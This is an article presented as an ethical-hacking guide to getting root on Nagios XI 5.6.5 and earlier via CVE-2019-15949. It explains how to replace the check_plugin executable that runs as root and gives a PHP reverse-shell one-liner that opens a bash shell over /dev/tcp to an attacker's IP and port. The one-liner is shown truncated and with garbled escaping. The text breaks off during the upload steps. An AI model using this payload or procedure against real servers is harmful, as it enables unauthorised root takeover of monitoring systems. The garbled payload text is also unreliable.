How To Crack Nagios XI: A Guide for Ethical Hackers
Nagios XI is a powerful network monitoring software that can alert users of any issues or incidents in their IT infrastructure. However, like any software, it may have some vulnerabilities that can be exploited by malicious actors. In this article, we will show you how to crack Nagios XI using a known root remote code execution (RCE) exploit and gain access to the server as root.
Disclaimer: This article is for educational purposes only and should not be used for illegal or unethical hacking. We are not responsible for any damages or consequences that may result from using this information.
A target server running Nagios XI <= 5.6.5. You can check the version by visiting the web interface and looking at the footer.
A Linux machine with PHP installed. You can use any Linux distribution, but we will use Kali Linux for this demonstration.
A reverse shell payload. You can use any reverse shell script or binary, but we will use a simple PHP one-liner for this demonstration.
A listener on your machine. You can use any tool that can listen for incoming connections, but we will use Netcat for this demonstration.
Step 1: Find the Vulnerability
The vulnerability we are going to exploit is CVE-2019-15949[^1^], which allows an attacker to leverage an RCE to escalate privileges to root. The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage plugins.
The vulnerability exists in the getprofile.sh script, invoked by downloading a system profile (profile.php?cmd=download), which is executed as root via a passwordless sudo entry; the script executes the 'check_plugin' executable which is owned by the nagios user. A user logged into Nagios XI with permissions to modify plugins, or the 'nagios' user on the server, can modify the 'check_plugin' executable and insert malicious commands executable as root.
Step 2: Prepare the Payload
The payload we are going to use is a simple PHP one-liner that executes a reverse shell to our machine:
& /dev/tcp/10.10.10.10/1234 0>&1'\\\"); ?>
Replace 10.10.10.10 with your IP address and 1234 with your port number.
Save this payload as check_plugin.php on your machine.
Step 3: Upload the Payload
There are two ways to upload the payload to the target server: via web interface or via SSH.
Via web interface:
Login to Nagios XI web interface with a valid username and password.